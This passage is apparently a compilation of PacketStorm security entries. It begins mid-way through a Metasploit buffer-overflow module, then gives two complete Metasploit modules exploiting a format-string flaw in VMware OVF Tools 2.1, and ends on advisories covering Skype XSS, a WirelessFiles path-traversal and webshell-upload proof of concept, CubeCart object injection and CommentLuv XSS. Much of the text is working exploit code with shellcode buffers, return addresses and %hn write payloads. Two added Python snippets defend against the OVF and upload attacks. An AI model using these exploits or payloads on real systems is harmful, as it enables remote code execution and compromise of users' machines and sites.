      'Payload'        =>
        {
          'BadChars'       => "\x00\x40",
          'DisableNops'    => true,
          'Space'          => 1000,
          'EncoderType'    => Msf::Encoder::Type::AlphanumMixed,
          'EncoderOptions' =>
            {
              'BufferRegister' => 'EBX'
            }
        },
      'Targets'        =>
        [
          [ 'Windows XP SP3',
            {
              'Ret'    => 0x775e3422, # ole32.dll v5.1.2600.6168
              'Offset' => 1024
            }
          ],
        ],
      'Privileged'     => false,
      'DisclosureDate' => 'Feb 5 2013',
      'DefaultTarget'  => 0))

    register_options([Opt::RPORT(0)], self.class)
  end

  def exploit
    connect

    getpc        = "\xe8\xff\xff\xff\xff\xc3\x5b" # getpc: call $+4 / inc ebx / pop ebx -> ebx points into the buffer
    add_ebx      = "\x83\xc3\x20"                 # add ebx,32
    fill         = "\x4b" * 5                     # dec ebx 5 times (0x4b is DEC EBX)
    fill2        = "\x90" * 17
    stack_adjust = "\x81\xc4\x24\xfa\xff\xff"     # add esp,-1500

    shell_chunk1 = payload.encoded[0,522]
    shell_chunk2 = payload.encoded[522,payload.encoded.length-522]

    buffer  = ""
    buffer << shell_chunk2
    buffer << rand_text_alpha(target['Offset']-buffer.length)
    buffer << [target.ret].pack('V')
    buffer << stack_adjust
    buffer << getpc
    buffer << add_ebx
    buffer << fill
    buffer << fill2
    buffer << shell_chunk1

    print_status("Trying target #{target.name}...")
    sock.put("@F506 "+buffer+"@\r\npwnag3\r\n\r\n")

    handler
    disconnect
  end
end
```

Source: PacketStorm
-
This Metasploit module exploits a format string vulnerability in VMWare OVF Tools 2.1 for Windows. The vulnerability occurs when printing error messages while parsing a malformed OVF file. The module has been tested successfully with VMWare OVF Tools 2.1 on Windows XP SP3.

```ruby
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML

  def initialize(info={})
    super(update_info(info,
      'Name'           => 'VMWare OVF Tools Format String Vulnerability',
      'Description'    => %q{
          This module exploits a format string vulnerability in VMWare OVF Tools 2.1 for
        Windows. The vulnerability occurs when printing error messages while parsing a
        malformed OVF file. The module has been tested successfully with VMWare OVF Tools
        2.1 on Windows XP SP3.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Jeremy Brown', # Vulnerability discovery
          'juan vazquez'  # Metasploit Module
        ],
      'References'     =>
        [
          [ 'CVE', '2012-3569' ],
          [ 'OSVDB', '87117' ],
          [ 'BID', '56468' ],
          [ 'URL', 'http://www.vmware.com/security/advisories/VMSA-2012-0015.html' ]
        ],
      'Payload'        =>
        {
          'DisableNops'     => true,
          'BadChars'        => (0x00..0x08).to_a.pack("C*") + "\x0b\x0c\x0e\x0f" + (0x10..0x1f).to_a.pack("C*") + (0x80..0xff).to_a.pack("C*") + "\x22",
          'StackAdjustment' => -3500,
          'PrependEncoder'  => "\x54\x59", # push esp # pop ecx
          'EncoderOptions'  =>
            {
              'BufferRegister' => 'ECX',
              'BufferOffset'   => 6
            }
        },
      'DefaultOptions' =>
        {
          'InitialAutoRunScript' => 'migrate -f'
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          # vmware-ovftool-2.1.0-467744-win-i386.msi
          [ 'VMWare OVF Tools 2.1 on Windows XP SP3',
            {
              'Ret'          => 0x7852753d, # call esp # MSVCR90.dll 9.00.30729.4148 installed with VMware OVF Tools 2.1
              'AddrPops'     => 98,
              'StackPadding' => 38081,
              'Alignment'    => 4096
            }
          ],
        ],
      'Privileged'     => false,
      'DisclosureDate' => 'Nov 08 2012',
      'DefaultTarget'  => 0))
  end

  def ovf
    my_payload =  rand_text_alpha(4)      # ebp
    my_payload << [target.ret].pack("V")  # eip # call esp
    my_payload << payload.encoded

    fs =  rand_text_alpha(target['StackPadding']) # Padding until address aligned to 0x10000 (for example 0x120000)
    fs << rand_text_alpha(target['Alignment'])    # Align to 0x11000
    fs << my_payload
    # 65536 => 0x10000
    # 27 => Error message prefix length
    fs << rand_text_alpha(65536 - 27 - target['StackPadding'] - target['Alignment'] - my_payload.length - (target['AddrPops'] * 8))
    fs << "%08x" * target['AddrPops']             # Reach saved EBP
    fs << "%hn"                                   # Overwrite LSW of saved EBP with 0x1000

    ovf_file = <<-EOF
<?xml version="1.0" encoding="UTF-8"?>
<Envelope vmw:buildId="build-162856" xmlns="http://schemas.dmtf.org/ovf/envelope/1" xmlns:cim="http://schemas.dmtf.org/wbem/wscim/1/common" xmlns:ovf="http://schemas.dmtf.org/ovf/envelope/1" xmlns:rasd="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/CIM_ResourceAllocationSettingData" xmlns:vmw="http://www.vmware.com/schema/ovf" xmlns:vssd="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/CIM_VirtualSystemSettingData" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
  <References>
    <File ovf:href="Small VM-disk1.vmdk" ovf:id="file1" ovf:size="68096" />
  </References>
  <DiskSection>
    <Info>Virtual disk information</Info>
    <Disk ovf:capacity="8" ovf:capacityAllocationUnits="#{fs}" ovf:diskId="vmdisk1" ovf:fileRef="file1" ovf:format="http://www.vmware.com/interfaces/specifications/vmdk.html#streamOptimized" />
  </DiskSection>
  <VirtualSystem ovf:id="Small VM">
    <Info>A virtual machine</Info>
  </VirtualSystem>
</Envelope>
    EOF

    ovf_file
  end

  def on_request_uri(cli, request)
    agent = request.headers['User-Agent']
    uri   = request.uri

    if agent !~ /VMware-client/ or agent !~ /ovfTool/
      print_status("User agent #{agent} not recognized, answering Not Found...")
      send_not_found(cli)
      return # stop here so that the OVF is not sent as a second response
    end

    if uri =~ /.mf$/
      # The manifest file isn't required
      print_status("Sending Not Found for Manifest file request...")
      send_not_found(cli)
      return
    end

    print_status("Sending OVF exploit...")
    send_response(cli, ovf, {'Content-Type'=>'text/xml'})
  end
end
```

Source: PacketStorm
-
This Metasploit module exploits a format string vulnerability in VMWare OVF Tools 2.1 for Windows. The vulnerability occurs when printing error messages while parsing a malformed OVF file. The module has been tested successfully with VMWare OVF Tools 2.1 on Windows XP SP3.

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'VMWare OVF Tools Format String Vulnerability',
      'Description'    => %q{
        This module exploits a format string vulnerability in VMWare OVF Tools 2.1 for
        Windows. The vulnerability occurs when printing error messages while parsing a
        malformed OVF file. The module has been tested successfully with VMWare OVF
        Tools 2.1 on Windows XP SP3.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Jeremy Brown', # Vulnerability discovery
          'juan vazquez'  # Metasploit Module
        ],
      'References'     =>
        [
          [ 'CVE', '2012-3569' ],
          [ 'OSVDB', '87117' ],
          [ 'BID', '56468' ],
          [ 'URL', 'http://www.vmware.com/security/advisories/VMSA-2012-0015.html' ]
        ],
      'Payload'        =>
        {
          'DisableNops'     => true,
          'BadChars'        => (0x00..0x08).to_a.pack("C*") + "\x0b\x0c\x0e\x0f" + (0x10..0x1f).to_a.pack("C*") + (0x80..0xff).to_a.pack("C*") + "\x22",
          'StackAdjustment' => -3500,
          'PrependEncoder'  => "\x54\x59", # push esp # pop ecx
          'EncoderOptions'  =>
            {
              'BufferRegister' => 'ECX',
              'BufferOffset'   => 6
            }
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          # vmware-ovftool-2.1.0-467744-win-i386.msi
          [ 'VMWare OVF Tools 2.1 on Windows XP SP3',
            {
              'Ret'          => 0x7852753d, # call esp # MSVCR90.dll 9.00.30729.4148 installed with VMware OVF Tools 2.1
              'AddrPops'     => 98,
              'StackPadding' => 38081,
              'Alignment'    => 4096
            }
          ],
        ],
      'Privileged'     => false,
      'DisclosureDate' => 'Nov 08 2012',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('FILENAME', [ true, 'The file name.', 'msf.ovf']),
      ], self.class)
  end

  def ovf
    my_payload = rand_text_alpha(4)      # ebp
    my_payload << [target.ret].pack("V") # eip # call esp
    my_payload << payload.encoded

    fs = rand_text_alpha(target['StackPadding']) # Padding until address aligned to 0x10000 (for example 0x120000)
    fs << rand_text_alpha(target['Alignment'])   # Align to 0x11000
    fs << my_payload
    # 65536 => 0x10000
    # 27 => Error message prefix length
    fs << rand_text_alpha(65536 - 27 - target['StackPadding'] - target['Alignment'] - my_payload.length - (target['AddrPops'] * 8))
    fs << "%08x" * target['AddrPops'] # Reach saved EBP
    fs << "%hn"                       # Overwrite LSW of saved EBP with 0x1000

    ovf_file = <<-EOF
<?xml version="1.0" encoding="UTF-8"?>
<Envelope vmw:buildId="build-162856" xmlns="http://schemas.dmtf.org/ovf/envelope/1" xmlns:cim="http://schemas.dmtf.org/wbem/wscim/1/common" xmlns:ovf="http://schemas.dmtf.org/ovf/envelope/1" xmlns:rasd="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/CIM_ResourceAllocationSettingData" xmlns:vmw="http://www.vmware.com/schema/ovf" xmlns:vssd="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/CIM_VirtualSystemSettingData" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
  <References>
    <File ovf:href="Small VM-disk1.vmdk" ovf:id="file1" ovf:size="68096" />
  </References>
  <DiskSection>
    <Info>Virtual disk information</Info>
    <Disk ovf:capacity="8" ovf:capacityAllocationUnits="#{fs}" ovf:diskId="vmdisk1" ovf:fileRef="file1" ovf:format="http://www.vmware.com/interfaces/specifications/vmdk.html#streamOptimized" />
  </DiskSection>
  <VirtualSystem ovf:id="Small VM">
    <Info>A virtual machine</Info>
  </VirtualSystem>
</Envelope>
EOF
    ovf_file
  end

  def exploit
    print_status("Creating '#{datastore['FILENAME']}'. This file should be opened with VMWare OVF 2.1")
    file_create(ovf)
  end

end

Source: PacketStorm
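A defender-side check for the class of input the two modules above build: the OVF parser echoes field values into error messages, so any printf-style directive inside an attribute such as ovf:capacityAllocationUnits is a red flag before the file reaches the tool. This is an added example, not code from the Metasploit module or from VMware; the regex, the reporting rules and the sample documents are constructed for this illustration.

```python
"""Scan an OVF envelope for printf-style format directives before it reaches a
parser that echoes field values into error messages.

Added example, not code from the Metasploit module or from VMware. The regex,
the reporting rules and the sample documents are constructed for this illustration.
"""
import re
import xml.etree.ElementTree as ET

# One printf-style conversion: flags, width, precision, length modifier and the
# conversion character. "%%" is an escaped percent sign and is matched first so
# that it is not counted as a directive.
_DIRECTIVE = re.compile(
    r"%%|%[-+ 0#]*(?:\d+|\*)?(?:\.(?:\d+|\*))?(?:hh|h|ll|l|j|z|t|L)?([diouxXeEfFgGaAcspn])"
)

def _local(name):
    """Strip the {namespace} prefix ElementTree puts on tags and attribute names."""
    return name.rsplit("}", 1)[-1]

def find_directives(value):
    """Return the conversion characters found in value, ignoring '%%'."""
    return [m.group(1) for m in _DIRECTIVE.finditer(value) if m.group(1)]

def scan_ovf(xml_text):
    """Return (location, reason) findings for every attribute or text node that
    carries a format directive. A '%n' family directive (the write primitive the
    module above uses as '%hn') is reported separately from read-only ones."""
    findings = []
    for elem in ET.fromstring(xml_text).iter():
        tag = _local(elem.tag)
        candidates = [(f"{tag}@{_local(k)}", v) for k, v in elem.attrib.items()]
        if elem.text and elem.text.strip():
            candidates.append((tag, elem.text))
        for where, value in candidates:
            convs = find_directives(value)
            if "n" in convs:
                findings.append((where, "%n write directive"))
            elif convs:
                findings.append((where, f"{len(convs)} read directive(s)"))
    return findings

def sample_ovf(units):
    """Minimal OVF with the given capacityAllocationUnits value (constructed)."""
    return (
        '<Envelope xmlns="http://schemas.dmtf.org/ovf/envelope/1" '
        'xmlns:ovf="http://schemas.dmtf.org/ovf/envelope/1">'
        "<DiskSection><Info>Virtual disk information</Info>"
        f'<Disk ovf:capacity="8" ovf:capacityAllocationUnits="{units}" '
        'ovf:diskId="vmdisk1" ovf:fileRef="file1"/></DiskSection></Envelope>'
    )

BENIGN_OVF = sample_ovf("byte * 2^30")
# Same shape as the module's payload, shortened: a run of "%08x" to walk the
# stack, then "%hn" to write.
MALICIOUS_OVF = sample_ovf("%08x" * 6 + "%hn")

if __name__ == "__main__":
    for name, doc in (("benign", BENIGN_OVF), ("malicious", MALICIOUS_OVF)):
        print(name, scan_ovf(doc))
```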
-
The Microsoft Skype GiftCards application suffers from multiple cross site scripting vulnerabilities.

Title:
======
Microsoft Skype Shop - GiftCards Persistent Vulnerability

Date:
=====
2013-01-30

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=826

MICROSOFT SECURITY RESPONSE CENTER (MSRC) ID: 13603
MICROSOFT SECURITY RESPONSE CENTER (MSRC) MANAGER: CL

VL-ID:
=====
826

Common Vulnerability Scoring System:
====================================
3.5

Introduction:
=============
Skype is a proprietary voice-over-Internet Protocol service and software application originally created in 2003 by Swedish entrepreneur Niklas Zennström and his Danish partner Janus Friis. It has been owned by Microsoft since 2011. The service allows users to communicate with peers by voice, video, and instant messaging over the Internet. Phone calls may be placed to recipients on the traditional telephone networks. Calls to other users within the Skype service are free of charge, while calls to landline telephones and mobile phones are charged via a debit-based user account system. Skype has also become popular for its additional features, including file transfer, and videoconferencing. Competitors include SIP and H.323-based services, such as Linphone, as well as the Google Talk service, Mumble and Hall.com. Skype has 663 million registered users as of September 2011. The network is operated by Microsoft, which has its Skype division headquarters in Luxembourg. Most of the development team and 44% of the overall employees of the division are situated in Tallinn and Tartu, Estonia.

Unlike most other VoIP services, Skype is a hybrid peer-to-peer and client–server system. It makes use of background processing on computers running Skype software. Skype's original proposed name (Sky Peer-to-Peer) reflects this fact. Some network administrators have banned Skype on corporate, government, home, and education networks, citing reasons such as inappropriate usage of resources, excessive bandwidth usage, and security concerns.

(Copy of the Vendor Homepage: http://en.wikipedia.org/wiki/Skype)

Abstract:
=========
The Vulnerability Laboratory Research Team discovered multiple persistent web vulnerabilities in the Microsoft Skype GiftCards application.

Report-Timeline:
================
2013-01-03: Researcher Notification & Coordination
2013-01-09: Vendor Notification
2013-01-10: Vendor Response/Feedback
2013-01-29: Vendor Fix/Patch (MSRC)
2013-01-30: Public Disclosure

Status:
========
Published

Affected Products:
==================
Microsoft Corp.
Product: Skype Shop 2013 Q1

Exploitation-Technique:
=======================
Remote

Severity:
=========
Medium

Details:
========
Multiple persistent input validation web vulnerabilities are detected in the official Microsoft Skype GiftCards application. The vulnerability allows an attacker to inject his own malicious script code in the vulnerable module on application side (persistent).

The vulnerabilities are located in the Skype shop gift cards module when processing to list the giftcard of the buyer or customer. The script code will be injected via the send giftcard function and allows an attacker to inject persistent script code as name, message and information details. The code will be executed in the review module but also at the end in the giftcard which will be sent to the customer or friend. The vulnerability can be exploited without an application user account and with low required user interaction.

Successful exploitation of the persistent input validation web vulnerability results in persistent session hijacking, persistent phishing, external redirect, external malware loads and persistent vulnerable module context manipulation.

Vulnerable Service(s):
    [+] Microsoft Corp. - Skype [Shop Service]

Vulnerable Module(s):
    [+] Skype GiftCards

Vulnerable Parameter(s):
    [+] An (to) - Name
    [+] Von (from) - Name
    [+] Vorname oder Rufname (first name or nickname)
    [+] Gift Card Message Body

Proof of Concept:
=================
The vulnerability can be exploited by remote attackers without a privileged application user account and with low required user interaction. For demonstration or reproduce ...

Review: Skype GiftCards - Name

<tbody><tr>
<td valign="middle" width="100%">
<table width="100%" border="0" cellpadding="20" cellspacing="0">
<tbody><tr>
<td class="inner_cell" valign="middle" width="100%">
<!-- // Begin Module: Standard Header Text \\ -->
<h1 style="font-family: 'Segoe UI', Arial, Helvetica, sans-serif; font-size: 24px; font-weight: normal; color: #666666; display: block; line-height: 120%; margin: 0;text-align: left;">
Hallo, <[PERSISTENT INJECTED SCRIPT CODE!]">%20%20%20%20[PERSISTENT INJECTED SCRIPT CODE!]">.
<br />

Review: Skype GiftCards - Ecard and Message Text

<!-- // Begin Module: Ecard and Message Text \\ --><td class="inner_cell" valign="middle" width="50%"><!-- MAX Chart 30 --><h4 class="h4" style="font-family: 'Segoe UI', Arial, Helvetica, sans-serif;font-size: 16px; font-weight: bold; color: #999999; display: block; line-height: 100%; margin: 0; text-align: left;">An <[PERSISTENT INJECTED SCRIPT CODE!]%20_[PERSISTENT INJECTED SCRIPT CODE!]">,</h4><br /><!-- MAX Chart 80 --><iframe src=a>%20[PERSISTENT INJECTED SCRIPT CODE!]") <<br /><br /><!-- MAX Chart 250 --><iframe src=a>%20[PERSISTENT INJECTED SCRIPT CODE!]") <<br /><br /><!-- MAX Chart 28 --><h4

Reference(s):
Service: http://shop.skype.com/skype-gift-cards
Module: https://de.chatandvision.com/skype_giftcard/payment#preview_div
Insert: https://de.chatandvision.com/skype_giftcard/personalize
Listing: https://de.chatandvision.com/skype_giftcard/payment

Solution:
=========
2013-01-29: Vendor Fix/Patch (MSRC)

Risk:
=====
The security risk of the persistent input validation web vulnerabilities is estimated as medium(+).

Credits:
========
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@vulnerability-lab.com)

Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register
Contact:    admin@vulnerability-lab.com - support@vulnerability-lab.com - research@vulnerability-lab.com
Section:    video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com
Social:     twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission.

Copyright © 2012 | Vulnerability Laboratory

--
VULNERABILITY RESEARCH LABORATORY
LABORATORY RESEARCH TEAM
CONTACT: research@vulnerability-lab.com

Source: PacketStorm
-
WirelessFiles version 1.1 suffers from local file inclusion and remote file access vulnerabilities.

Title:
======
WirelessFiles v1.1 iPad iPhone - Multiple Web Vulnerabilities

Date:
=====
2013-02-06

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=847

VL-ID:
=====
848

Common Vulnerability Scoring System:
====================================
7.5

Introduction:
=============
This application starts a web server on your device and allows downloads and uploads of any files from it using any browser on any other computer or device. No cables, drivers or clients are necessary, just a browser. Right from this application you can send these files to any other application ready to accept this file type. Or, you can send the files to Wireless Files for further download to your computer. There are no problems with national file names. With this program you have web access to photos and videos on your device. Show your photos in a nice Web Album on a big screen without cables and so on. For that, you need to enter your web-server from any computer using the LAN or WWAN address. Just type one of the indicated addresses in the address bar of your browser (Internet Explorer, Mozilla Firefox, Safari or any others). Also, you can start WirelessFiles on one device, enter the web-server in your browser from another device, and transfer your photos, for example, to the first device, and then put them in Camera Roll. (The transfer of photos to and from Camera Roll is available only in iOS 6 and up.)

For all this to work, you need to have a working connection to the network where your device is located. For LAN, it usually works right on the spot, if you have a modem or Wi-Fi router. If you have an AccessPoint (AP) connected to your modem or router, you will need to switch the AP to the bridge mode in order to join the local network and Wi-Fi network into one. In case you experience problems with connection, contact a specialist – this can be easily adjusted. It's much harder with WWAN. It's a network access point provided by your cell network operator. As a rule, you cannot connect your computer to your device using WWAN. Still, if Internet access on your computer is provided by the same operator, everything will get connected and running. The application wouldn't work in the background, so it switches off autoblocking while running. Any unexpected calls will interrupt your file transfer.

By default, the application allows storing a limited number of files – no more than 3 of them, with the size of each not more than 10 MB. But you can remove all these limitations at the minimal price of $0.99 / €0.89. Second limitation - the program shows only the first 10 photos in the webalbum; remove this limitation - $0.99 / €0.89. Still, if something isn't working, DO NOT buy removal of restrictions – this will not improve operability of the system itself. Pay ONLY in case everything works, and you need to store more than 3 files or larger size. The application includes basic protection of the web-server from unauthorized access.

(Copy of the Homepage: https://itunes.apple.com/de/app/wirelessfiles/id573161053 )

Abstract:
=========
The Vulnerability Laboratory Research Team discovered a local file include vulnerability in the mobile WirelessFiles v1.1 app for the Apple iPad & iPhone.

Report-Timeline:
================
2013-02-06: Public Disclosure

Status:
========
Published

Affected Products:
==================
Apple AppStore
Product: WirelessFiles Application - (iPad & iPhone) 1.1

Exploitation-Technique:
=======================
Remote

Severity:
=========
High

Details:
========
A local file include web vulnerability via POST request method is detected in the mobile WirelessFiles v1.1 app for the Apple iPad & iPhone. The vulnerability allows remote attackers via POST method to inject local app webserver folders to request unauthorized local webserver files.

1.1
The main vulnerability is located in the upload file submit form of the webserver (http://192.168.0.10/) when processing to load a manipulated filename via POST. The execution of the injected path or file request will occur when the attacker is watching the file index listing.

1.2
Attackers can also, unauthorized, implement mobile webshells by using a double filename extension (bild.js.php.jpg) when processing to upload (submit) via POST request method. The attacker uploads a file with a double extension and accesses the file in the second step via the directory webserver listing to compromise the Apple iPhone or iPad.

Exploitation of the local file include web vulnerability does not require user interaction but a low privileged user account (standard pass blank). Successful exploitation of the local web vulnerability results in iPad or iPhone compromise via file include attack.

Vulnerable Application(s):
    [+] WirelessFiles - iTunes or AppStore (Apple)

Vulnerable Module(s):
    [+] File Upload via Submit (Web Server) [Remote]

Vulnerable Parameter(s):
    [+] filename

Affected Module(s):
    [+] Filename - Listing
    [+] Webalbum Filename - Listing

Proof of Concept:
=================
1.1
The vulnerability can be exploited by remote attackers with a low privileged application user account and without required user interaction. For demonstration or reproduce ...

Local File Include - PoC (POST)

POSTDATA =-----------------------------200962619920015
Content-Disposition: form-data; name="value"; filename="../../../../cmd>home>tmp.png"   # < Include Path & File
Content-Type: image/png
--
Authorization=Digest username="ben37", realm="defaultRealm@host.com", nonce="2D2E8D09-6502-4266-B95E-28EB15CA8896", uri="/", response="9942037c9ddae787f56cadcdb7570c89", qop=auth, nc=00000014, cnonce="9cb396be6aa86cb3"

Review: Filename - (Upload) Listing

<tbody><tr class="styleZag">
<th scope="col" width="50%"><div align="left"> File Name</div></th>
<th scope="col" width="25%"><span>Date and Time</span></th>
<th scope="col" width="25%"><div align="right">Size</div></th>
</tr>
<tr class="styleRow">
<th scope="col" width="50%"><div align="left">
<a href="http://192.168.0.10/../../../../cmd>home>tmp.png?%00"> <../../../../cmd>home>tmp.png?%00">%20%20%20%20</a></div></th>

1.2
The vulnerability can be exploited by remote attackers with a low privileged application user account and without required user interaction. For demonstration or reproduce ...

Unauthorized File Upload/Access (Webshell)

POSTDATA =-----------------------------200962619920015
Content-Disposition: form-data; name="value"; filename="hacking.js.php.jpg"   # < Include File with multiple file extensions
Content-Type: image/png
--
Authorization=Digest username="ben38", realm="defaultRealm@host.com", nonce="2D2E8D09-6502-4266-B95E-28EB15CA8896", uri="/", response="9942037c9ddae787f56cadcdb7570c89", qop=auth, nc=00000014, cnonce="9cb396be6aa86cb3"

Review: Filename - (Upload) Listing

<tbody><tr class="styleZag">
<th scope="col" width="50%"><div align="left"> File Name</div></th>
<th scope="col" width="25%"><span>Date and Time</span></th>
<th scope="col" width="25%"><div align="right">Size</div></th>
</tr>
<tr class="styleRow">
<th scope="col" width="50%"><div align="left">
<a href="http://192.168.0.10/hacking.js.php.jpg"><a href=hacking.js.php.jpg></a>%20%20%20%20</a></div></th>

Risk:
=====
The security risk of the local file include web vulnerability and the unauthorized file upload/access bug is estimated as high(+).

Credits:
========
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@vulnerability-lab.com)

Source: PacketStorm
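Both PoCs above pass through the same missing control: the server takes the client's filename as a path and trusts the last extension. The following is an added example, not the WirelessFiles app's own code, of the server-side checks a file upload handler needs; the function name, the extension allow-list and the magic-byte table are assumptions made for this illustration.

```python
"""Server-side checks for a multipart file upload: reject path components in the
filename, stacked extensions such as name.js.php.jpg, and content whose bytes do
not match the extension.

Added example, not the WirelessFiles app's code. The function name, the
allow-list and the magic-byte table are assumptions chosen for this illustration.
"""
import re

# Extensions the upload form is meant to accept (constructed policy).
ALLOWED_EXTENSIONS = {"png", "jpg", "jpeg", "gif"}

# Leading bytes each type must start with; the declared Content-Type is never
# trusted on its own.
MAGIC = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
}
MIME_FOR = {"png": "image/png", "jpg": "image/jpeg", "jpeg": "image/jpeg", "gif": "image/gif"}

# The stem may only contain characters that are inert in paths, URLs and HTML,
# so a value such as "cmd>home>tmp" from the advisory is rejected.
_SAFE_STEM = re.compile(r"^[A-Za-z0-9_-]{1,64}$")

def validate_upload(filename, content, declared_type):
    """Return (accepted, reason, stored_name); stored_name is None when rejected."""
    # 1. The client-supplied name is data, never a path: no separators, no NUL,
    #    no parent references, regardless of how the server later joins paths.
    if "\x00" in filename or "/" in filename or "\\" in filename or ".." in filename:
        return False, "path separator, NUL or '..' in filename", None
    # 2. Exactly one extension. "hacking.js.php.jpg" has three and is refused
    #    outright instead of trusting the last one.
    parts = filename.split(".")
    if len(parts) != 2:
        return False, "filename must be stem.ext with a single extension", None
    stem, ext = parts[0], parts[1].lower()
    if not _SAFE_STEM.match(stem):
        return False, "stem contains characters outside [A-Za-z0-9_-]", None
    if ext not in ALLOWED_EXTENSIONS:
        return False, f"extension .{ext} not allowed", None
    # 3. Declared type and actual bytes must both agree with the extension.
    if declared_type != MIME_FOR[ext]:
        return False, "declared Content-Type does not match extension", None
    if not any(content.startswith(m) for m in MAGIC[ext]):
        return False, "file content does not match extension", None
    return True, "ok", f"{stem}.{ext}"

# Constructed sample: a minimal PNG signature followed by filler bytes.
SAMPLE_PNG = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16

if __name__ == "__main__":
    for name in ("photo.png", "../../../../cmd>home>tmp.png", "hacking.js.php.jpg"):
        print(name, validate_upload(name, SAMPLE_PNG, "image/png"))
```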
-
CubeCart versions 5.0.0 through 5.2.0 suffer from a PHP object injection vulnerability in cubecart.class.php.

-------------------------------------------------------------------------
CubeCart <= 5.2.0 (cubecart.class.php) PHP Object Injection Vulnerability
-------------------------------------------------------------------------

[-] Software Link:

http://www.cubecart.com/

[-] Affected Versions:

All versions from 5.0.0 to 5.2.0

[-] Vulnerability Description:

The vulnerable code is located in the Cubecart::_basket() method defined in the /classes/cubecart.class.php script:

519.  // Update shipping values
520.  if (isset($_POST['shipping']) && !empty($_POST['shipping'])) {
521.      $GLOBALS['cart']->set('shipping', unserialize(base64url_decode($_POST['shipping'])));
522.      if (!isset($_POST['proceed'])) {
523.          httpredir(currentPage());
524.      }
525.  }

User input passed through the $_POST['shipping'] parameter is not properly sanitized before being used in an unserialize() call at line 521. This can be exploited to inject an arbitrary object into the application scope. For example, the destructor method of the "Config" class could be abused:

78.  public function __destruct() {
79.      //Do we need to write to the db
80.      if ($this->_write_db) {
81.          $this->_writeDB();
82.      }
83.  }

By sending a specially crafted serialized "Config" object, an attacker might be able to change the application configuration settings with arbitrary values, and this can make the application vulnerable to malicious attacks such as Cross-Site Scripting, SQL Injection or Denial of Service.

[-] Solution:

Upgrade to version 5.2.1 or higher.

[-] Disclosure Timeline:

[27/01/2013] - Issue reported to http://bugs.cubecart.com/view.php?id=511
[31/01/2013] - Version 5.2.1 released: http://forums.cubecart.com/?showtopic=47026
[31/01/2013] - CVE number requested
[04/02/2013] - CVE number assigned
[06/02/2013] - Public disclosure

[-] CVE Reference:

The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2013-1465 to this vulnerability.

[-] Credits:

Vulnerability discovered by Egidio Romano.

[-] Original Advisory:

http://karmainsecurity.com/KIS-2013-02

Source: PacketStorm
-
WordPress CommentLuv version 2.92.3 suffers from a cross site scripting vulnerability.

Advisory ID: HTB23138
Product: CommentLuv WordPress plugin
Vendor: Andy Bailey
Vulnerable Version(s): 2.92.3 and probably prior
Tested Version: 2.92.3
Vendor Notification: January 16, 2013
Vendor Patch: January 17, 2013
Public Disclosure: February 6, 2013
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2013-1409
Risk Level: Low
CVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered a vulnerability in the CommentLuv WordPress plugin, which can be exploited to perform Cross-Site Scripting (XSS) attacks.

1) Cross-Site Scripting (XSS) in CommentLuv WordPress plugin: CVE-2013-1409

The vulnerability exists due to insufficient filtration of user-supplied data in the "_ajax_nonce" HTTP POST parameter in the "/wp-admin/admin-ajax.php" script. A remote attacker can trick a logged-in administrator into opening a specially crafted link and execute arbitrary HTML and script code in the browser in the context of the vulnerable website.

